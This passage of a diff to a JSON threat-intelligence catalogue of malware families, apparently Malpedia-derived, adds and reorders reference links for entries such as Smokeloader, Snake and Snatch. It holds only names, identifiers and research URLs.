+ "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike",
+ "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f",
+ "https://asec.ahnlab.com/en/47088/",
+ "https://www.ncsc.gov.uk/files/Advisory%20Further%20TTPs%20associated%20with%20SVR%20cyber%20actors.pdf",
+ "https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/",
+ "https://github.com/BishopFox/sliver",
+ "https://www.telsy.com/download/5900/?uid=b797afdcfb",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://github.com/chronicle/GCTI",
+ "https://team-cymru.com/blog/2022/04/29/sliver-case-study-assessing-common-offensive-security-tools/",
+ "https://www.team-cymru.com/post/sliver-case-study-assessing-common-offensive-security-tools",
+ "https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/"
],
"synonyms": [],
"type": []
@@ -42076,13 +44337,26 @@
"uuid": "654c478e-3c9a-4fd9-a9b7-dd6839f51147",
"value": "Sliver"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.slnrat",
+ "https://asec.ahnlab.com/ko/37764/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "68bb36d3-d078-483d-b559-e0d8da5f45fe",
+ "value": "slnrat"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.slothfulmedia",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a",
- "https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/"
+ "https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a"
],
"synonyms": [
"QueenOfClubs"
@@ -42099,9 +44373,9 @@
"https://malpedia.caad.fkie.fraunhofer.de/details/win.slub",
"https://www.trendmicro.com/en_us/research/20/j/operation-earth-kitsune-a-dance-of-two-new-backdoors.html",
"https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-LunghiHorejsi.pdf",
- "https://www.trendmicro.com/en_us/research/20/l/who-is-the-threat-actor-behind-operation-earth-kitsune-.html",
"https://blog.trendmicro.com/trendlabs-security-intelligence/new-slub-backdoor-uses-github-communicates-via-slack/",
- "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-kitsune.pdf"
+ "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-kitsune.pdf",
+ "https://www.trendmicro.com/en_us/research/20/l/who-is-the-threat-actor-behind-operation-earth-kitsune-.html"
],
"synonyms": [],
"type": []
@@ -42114,8 +44388,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.smac",
- "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/Aug.10.The_Italian_Connection_An_analysis_of_exploit_supply_chains_and_digital_quartermasters/HTExploitTelemetry.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-express"
+ "https://www.secureworks.com/research/threat-profiles/bronze-express",
+ "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/Aug.10.The_Italian_Connection_An_analysis_of_exploit_supply_chains_and_digital_quartermasters/HTExploitTelemetry.pdf"
],
"synonyms": [
"speccom"
@@ -42143,18 +44417,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.smanager",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://blog.vincss.net/2020/12/re018-2-analyzing-new-malware-of-china-panda-hacker-group-used-to-attack-supply-chain-against-vietnam-government-certification-authority.html?m=1",
- "https://blog.vincss.net/2020/12/re017-2-phan-tich-ky-thuat-dong-ma-doc-moi-co-nhieu-dau-hieu-lien-quan-toi-nhom-tin-tac-Panda.html",
- "https://blog.vincss.net/2020/12/re018-1-analyzing-new-malware-of-china-panda-hacker-group-used-to-attack-supply-chain-against-vietnam-government-certification-authority.html",
- "https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/",
"https://0xthreatintel.medium.com/reversing-apt-tool-smanager-unpacked-d413a04961c4",
+ "https://www.welivesecurity.com/2020/12/17/operation-signsight-supply-chain-attack-southeast-asia/",
+ "https://blog.vincss.net/2020/12/phan-tich-ky-thuat-dong-ma-doc-moi-co-nhieu-dau-hieu-lien-quan-toi-nhom-tin-tac-Panda.html",
+ "https://blog.group-ib.com/task",
+ "https://blog.vincss.net/2020/12/re018-1-analyzing-new-malware-of-china-panda-hacker-group-used-to-attack-supply-chain-against-vietnam-government-certification-authority.html",
+ "https://blog.vincss.net/2020/12/re018-2-analyzing-new-malware-of-china-panda-hacker-group-used-to-attack-supply-chain-against-vietnam-government-certification-authority.html?m=1",
"https://blog.vincss.net/2021/02/re020-elephantrat-kunming-version-our-latest-discovered-RAT-of-Panda.html",
"https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager",
- "https://blog.vincss.net/2020/12/phan-tich-ky-thuat-dong-ma-doc-moi-co-nhieu-dau-hieu-lien-quan-toi-nhom-tin-tac-Panda.html",
- "https://www.welivesecurity.com/2020/12/17/operation-signsight-supply-chain-attack-southeast-asia/",
+ "https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/",
+ "https://blog.vincss.net/2020/12/re017-2-phan-tich-ky-thuat-dong-ma-doc-moi-co-nhieu-dau-hieu-lien-quan-toi-nhom-tin-tac-Panda.html",
"https://0xthreatintel.medium.com/how-to-unpack-smanager-apt-tool-cb5909819214",
- "https://blog.group-ib.com/task"
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf"
],
"synonyms": [
"PhantomNet"
@@ -42182,8 +44456,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.smaug",
- "https://www.anomali.com/blog/anomali-threat-research-releases-first-public-analysis-of-smaug-ransomware-as-a-service",
"https://labs.sentinelone.com/multi-platform-smaug-raas-aims-to-see-off-competitors/",
+ "https://www.anomali.com/blog/anomali-threat-research-releases-first-public-analysis-of-smaug-ransomware-as-a-service",
"https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html"
],
"synonyms": [],
@@ -42197,8 +44471,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.smokedham",
- "https://www.mandiant.com/resources/burrowing-your-way-into-vpns",
"https://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise",
+ "https://www.mandiant.com/resources/burrowing-your-way-into-vpns",
"https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html"
],
"synonyms": [],
@@ -42212,71 +44486,77 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://www.cert.pl/en/news/single/dissecting-smoke-loader/",
- "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/",
- "https://m.alvar.es/2020/06/comparative-analysis-between-bindiff.html",
- "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html",
- "https://x0r19x91.in/malware-analysis/smokeloader/",
- "http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
- "https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities",
- "https://bartblaze.blogspot.com/2017/08/crystal-finance-millennium-used-to.html",
- "https://www.sentinelone.com/blog/going-deep-a-guide-to-reversing-smoke-loader-malware/",
- "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
- "https://info.phishlabs.com/blog/smoke-loader-adds-additional-obfuscation-methods-to-mitigate-analysis",
- "https://blog.malwarebytes.com/social-engineering/2020/09/malvertising-campaigns-come-back-in-full-swing/",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://www.silentpush.com/blog/privacy-tools-not-for-you",
- "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.101_ENG.pdf",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
- "http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html",
- "https://drive.google.com/file/d/13BsHZn-KVLhwrtgS2yKJAM2_U_XZlwoD/view",
- "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html",
- "https://research.openanalysis.net/smoke/smokeloader/loader/config/yara/triage/2022/08/25/smokeloader.html",
- "https://blog.malwarebytes.com/cybercrime/2018/01/fake-spectre-and-meltdown-patch-pushes-smoke-loader/",
- "http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html",
- "https://asec.ahnlab.com/en/33600/",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://n1ght-w0lf.github.io/malware%20analysis/smokeloader/",
- "https://int0xcc.svbtle.com/a-taste-of-our-own-medicine-how-smokeloader-is-deceiving-dynamic-configuration-extraction-by-using-binary-code-as-bait",
- "https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe",
- "https://danusminimus.github.io/Analyzing-Modern-Malware-Techniques-Part-4/",
- "https://research.checkpoint.com/2019-resurgence-of-smokeloader/",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part3/",
- "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor",
- "https://blogs.blackberry.com/en/2022/02/threat-thursday-arkei-infostealer",
- "https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries",
- "https://suvaditya.one/malware-analysis/smokeloader/",
- "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet/",
- "https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/",
- "https://www.spamhaus.org/news/article/774/smoke-loader-improves-encryption-after-microsoft-spoils-its-campaign",
- "https://github.com/vc0RExor/Quick-Analysis/blob/main/SmokeLoader/SmokeLoader.md",
- "https://hatching.io/blog/tt-2020-08-27/",
- "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
- "https://securitynews.sonicwall.com/xmlpost/html-application-hta-files-are-being-used-to-distribute-smoke-loader-malware/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.bleepingcomputer.com/news/security/new-golang-botnet-empties-windows-users-cryptocurrency-wallets/",
- "https://www.proofpoint.com/us/blog/threat-insight/now-you-see-it-now-you-dont-copperstealer-performs-widespread-theft",
- "https://intel471.com/blog/privateloader-malware",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
- "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
- "https://malwareandstuff.com/examining-smokeloaders-anti-hooking-technique/",
- "https://www.bitsight.com/blog/tracking-privateloader-malware-distribution-service",
- "https://de.darktrace.com/blog/privateloader-network-based-indicators-of-compromise",
- "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
- "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
- "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a",
- "https://m.alvar.es/2020/06/unpacking-smokeloader-and.html",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://www.telekom.com/en/blog/group/article/a-new-way-to-encrypt-cc-server-urls-614886",
"https://blog.badtrace.com/post/anti-hooking-checks-of-smokeloader-2018/",
- "https://m.alvar.es/2019/10/dynamic-imports-and-working-around.html",
- "http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html",
- "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/",
+ "https://www.bitsight.com/blog/tracking-privateloader-malware-distribution-service",
+ "https://www.telekom.com/en/blog/group/article/a-new-way-to-encrypt-cc-server-urls-614886",
+ "https://x0r19x91.in/malware-analysis/smokeloader/",
+ "https://blogs.blackberry.com/en/2022/07/smokeloader-malware-used-to-augment-amadey-infostealer",
+ "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a",
+ "https://blog.malwarebytes.com/social-engineering/2020/09/malvertising-campaigns-come-back-in-full-swing/",
+ "https://research.checkpoint.com/2019-resurgence-of-smokeloader/",
+ "http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html",
+ "https://hatching.io/blog/tt-2020-08-27/",
+ "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor",
+ "https://youtu.be/QOypldw6hnY?t=3237",
+ "https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries",
+ "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
+ "https://intel471.com/blog/privateloader-malware",
+ "https://research.openanalysis.net/smoke/smokeloader/loader/config/yara/triage/2022/08/25/smokeloader.html",
+ "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://www.proofpoint.com/us/blog/threat-insight/now-you-see-it-now-you-dont-copperstealer-performs-widespread-theft",
+ "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet/",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
+ "https://www.cert.pl/en/news/single/dissecting-smoke-loader/",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
+ "https://github.com/vc0RExor/Quick-Analysis/blob/main/SmokeLoader/SmokeLoader.md",
+ "https://www.spamhaus.org/news/article/774/smoke-loader-improves-encryption-after-microsoft-spoils-its-campaign",
"https://eternal-todo.com/blog/smokeloader-analysis-yulia-photo",
+ "https://blog.malwarebytes.com/cybercrime/2018/01/fake-spectre-and-meltdown-patch-pushes-smoke-loader/",
+ "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/",
+ "https://de.darktrace.com/blog/privateloader-network-based-indicators-of-compromise",
+ "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.101_ENG.pdf",
+ "https://danusminimus.github.io/Analyzing-Modern-Malware-Techniques-Part-4/",
+ "https://m.alvar.es/2020/06/comparative-analysis-between-bindiff.html",
+ "https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore",
"https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-down-dofoil-with-windows-defender-atp/",
- "https://blogs.blackberry.com/en/2022/07/smokeloader-malware-used-to-augment-amadey-infostealer"
+ "https://www.silentpush.com/blog/privacy-tools-not-for-you",
+ "http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html",
+ "https://info.phishlabs.com/blog/smoke-loader-adds-additional-obfuscation-methods-to-mitigate-analysis",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://m.alvar.es/2019/10/dynamic-imports-and-working-around.html",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities",
+ "http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html",
+ "https://m.alvar.es/2020/06/unpacking-smokeloader-and.html",
+ "https://blogs.blackberry.com/en/2022/02/threat-thursday-arkei-infostealer",
+ "http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html",
+ "https://drive.google.com/file/d/13BsHZn-KVLhwrtgS2yKJAM2_U_XZlwoD/view",
+ "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
+ "https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe",
+ "https://www.sentinelone.com/blog/going-deep-a-guide-to-reversing-smoke-loader-malware/",
+ "https://suvaditya.one/malware-analysis/smokeloader/",
+ "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/",
+ "https://asec.ahnlab.com/en/33600/",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
+ "https://asec.ahnlab.com/en/36634/",
+ "https://bartblaze.blogspot.com/2017/08/crystal-finance-millennium-used-to.html",
+ "https://securitynews.sonicwall.com/xmlpost/html-application-hta-files-are-being-used-to-distribute-smoke-loader-malware/",
+ "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html",
+ "https://malwareandstuff.com/examining-smokeloaders-anti-hooking-technique/",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://malwarology.substack.com/p/malicious-packer-pkr_ce1a?r=1lslzd",
+ "https://int0xcc.svbtle.com/a-taste-of-our-own-medicine-how-smokeloader-is-deceiving-dynamic-configuration-extraction-by-using-binary-code-as-bait",
+ "https://n1ght-w0lf.github.io/malware%20analysis/smokeloader/",
+ "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/",
+ "https://www.bleepingcomputer.com/news/security/new-golang-botnet-empties-windows-users-cryptocurrency-wallets/",
+ "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part3/",
+ "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html"
],
"synonyms": [
"Dofoil",
@@ -42294,8 +44574,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.smominru",
- "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/",
- "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators"
+ "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators",
+ "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/"
],
"synonyms": [
"Ismo"
@@ -42337,31 +44617,31 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.snake",
- "https://github.com/albertzsigovits/malware-notes/blob/master/Snake.md",
+ "https://insights.sei.cmu.edu/cert/2020/03/snake-ransomware-analysis-updates.html",
"https://www.dragos.com/blog/industry-news/ekans-ransomware-misconceptions-and-misunderstandings/",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
+ "https://twitter.com/bad_packets/status/1270957214300135426",
+ "https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot",
+ "https://krebsonsecurity.com/2020/05/europes-largest-private-hospital-operator-fresenius-hit-by-ransomware",
+ "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html",
+ "https://ics-cert.kaspersky.com/alerts/2020/06/17/targeted-attacks-on-industrial-companies-using-snake-ransomware/",
+ "https://www.bleepingcomputer.com/news/security/honda-investigates-possible-ransomware-attack-networks-impacted/",
+ "https://www.ccn-cert.cni.es/pdf/5045-ccn-cert-id-15-20-snake-locker-english-1/file.html",
+ "https://www.fortinet.com/blog/threat-research/ekans-ransomware-targeting-ot-ics-systems",
+ "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
+ "https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/",
+ "https://www.goggleheadedhacker.com/blog/post/22",
+ "https://twitter.com/milkr3am/status/1270019326976786432",
+ "https://blog.malwarebytes.com/threat-analysis/2020/06/honda-and-enel-impacted-by-cyber-attack-suspected-to-be-ransomware/",
+ "https://hub.dragos.com/hubfs/Whitepaper-Downloads/Dragos_Manufacturing%20Threat%20Perspective_1120.pdf",
"https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf",
"https://medium.com/@nishanmaharjan17/malware-analysis-snake-ransomware-a0e66f487017",
"https://www.0ffset.net/reverse-engineering/analysing-snake-ransomware/",
- "https://www.bleepingcomputer.com/news/security/snake-ransomware-is-the-next-threat-targeting-business-networks/",
- "https://www.fortinet.com/blog/threat-research/ekans-ransomware-targeting-ot-ics-systems",
- "https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/",
- "https://ics-cert.kaspersky.com/alerts/2020/06/17/targeted-attacks-on-industrial-companies-using-snake-ransomware/",
- "https://twitter.com/bad_packets/status/1270957214300135426",
- "https://krebsonsecurity.com/2020/05/europes-largest-private-hospital-operator-fresenius-hit-by-ransomware",
- "https://www.bleepingcomputer.com/news/security/honda-investigates-possible-ransomware-attack-networks-impacted/",
- "https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot",
- "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html",
- "https://blog.malwarebytes.com/threat-analysis/2020/06/honda-and-enel-impacted-by-cyber-attack-suspected-to-be-ransomware/",
- "https://insights.sei.cmu.edu/cert/2020/03/snake-ransomware-analysis-updates.html",
- "https://www.goggleheadedhacker.com/blog/post/22",
"https://dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/",
- "https://twitter.com/milkr3am/status/1270019326976786432",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
- "https://labs.sentinelone.com/new-snake-ransomware-adds-itself-to-the-increasing-collection-of-golang-crimeware/",
- "https://hub.dragos.com/hubfs/Whitepaper-Downloads/Dragos_Manufacturing%20Threat%20Perspective_1120.pdf",
- "https://www.ccn-cert.cni.es/pdf/5045-ccn-cert-id-15-20-snake-locker-english-1/file.html",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/"
+ "https://www.bleepingcomputer.com/news/security/snake-ransomware-is-the-next-threat-targeting-business-networks/",
+ "https://labs.sentinelone.com/new-snake-ransomware-adds-itself-to-the-increasing-collection-of-golang-crimeware/",
+ "https://github.com/albertzsigovits/malware-notes/blob/master/Snake.md"
],
"synonyms": [
"EKANS",
@@ -42377,18 +44657,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch",
- "https://www.secureworks.com/blog/ransomware-groups-use-tor-based-backdoor-for-persistent-access",
- "https://twitter.com/VK_Intel/status/1191414501297528832",
"https://www.crowdstrike.com/blog/financial-motivation-drives-golang-malware-adoption/",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
+ "https://www.secureworks.com/blog/ransomware-groups-use-tor-based-backdoor-for-persistent-access",
+ "https://github.com/albertzsigovits/malware-notes/blob/master/Snatch.md",
+ "https://www.bleepingcomputer.com/news/security/snatch-ransomware-reboots-to-windows-safe-mode-to-bypass-av-tools/",
"https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
"https://intel471.com/blog/a-brief-history-of-ta505",
"https://thedfirreport.com/2020/06/21/snatch-ransomware/",
- "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
- "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://github.com/albertzsigovits/malware-notes/blob/master/Snatch.md",
- "https://www.bleepingcomputer.com/news/security/snatch-ransomware-reboots-to-windows-safe-mode-to-bypass-av-tools/",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/"
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://twitter.com/VK_Intel/status/1191414501297528832",
+ "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/"
],
"synonyms": [],
"type": []
@@ -42401,6 +44681,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.snatchcrypto",
+ "https://blog.sekoia.io/the-dprk-delicate-sound-of-cyber/",
+ "https://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html",
"https://threatbook.cn/ppt/The%2520Nightmare%2520of%2520Global%2520Cryptocurrency%2520Companies%2520-%2520Demystifying%2520the%2520%25E2%2580%259CDangerousPassword%25E2%2580%259D%2520of%2520the%2520APT%2520Organization.pdf",
"https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/"
],
@@ -42415,11 +44697,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch_loader",
+ "https://www.youtube.com/watch?v=k3sM88o_maM",
"https://www.arbornetworks.com/blog/asert/snatchloader-reloaded/",
"https://myonlinesecurity.co.uk/your-order-no-8194788-has-been-processed-malspam-delivers-malware/",
- "https://www.youtube.com/watch?v=k3sM88o_maM",
- "https://twitter.com/VK_Intel/status/898549340121288704",
- "https://zerophagemalware.com/2017/12/11/malware-snatch-loader-reloaded/"
+ "https://zerophagemalware.com/2017/12/11/malware-snatch-loader-reloaded/",
+ "https://twitter.com/VK_Intel/status/898549340121288704"
],
"synonyms": [],
"type": []
@@ -42447,26 +44729,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.snifula",
- "https://www.circl.lu/assets/files/tr-13/tr-13-snifula-analysis-report-v1.3.pdf",
"https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
- "https://www.zdnet.com/article/ursnif-trojan-has-targeted-over-100-italian-banks/",
"https://malware.love/malware_analysis/reverse_engineering/2020/11/27/analyzing-a-vbs-dropper.html",
- "https://www.darktrace.com/en/blog/the-resurgence-of-the-ursnif-banking-trojan/"
+ "https://www.circl.lu/assets/files/tr-13/tr-13-snifula-analysis-report-v1.3.pdf",
+ "https://www.darktrace.com/en/blog/the-resurgence-of-the-ursnif-banking-trojan/",
+ "https://www.zdnet.com/article/ursnif-trojan-has-targeted-over-100-italian-banks/",
+ "https://medium.com/csis-techblog/chapter-1-from-gozi-to-isfb-the-history-of-a-mythical-malware-family-82e592577fef"
],
"synonyms": [
"Ursnif"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "75b01a1e-3269-4f4c-bdba-37af4e9c3f54",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "4f3ad937-bf2f-40cb-9695-a2bedfd41bfa",
"value": "Snifula"
},
@@ -42528,10 +44802,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.socelars",
- "https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
"https://www.bleepingcomputer.com/news/security/facebook-ads-manager-targeted-by-new-info-stealing-trojan/",
"https://twitter.com/VK_Intel/status/1201584107928653824",
"https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html",
"https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/"
],
"synonyms": [],
@@ -42545,10 +44820,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sockbot",
- "https://www.bleepingcomputer.com/news/security/hackers-fork-open-source-reverse-tunneling-tool-for-persistence/",
- "https://www.youtube.com/watch?v=CAMnuhg-Qos",
"https://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html",
- "https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf"
+ "https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf",
+ "https://www.bleepingcomputer.com/news/security/hackers-fork-open-source-reverse-tunneling-tool-for-persistence/",
+ "https://www.youtube.com/watch?v=CAMnuhg-Qos"
],
"synonyms": [],
"type": []
@@ -42573,10 +44848,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.socksbot",
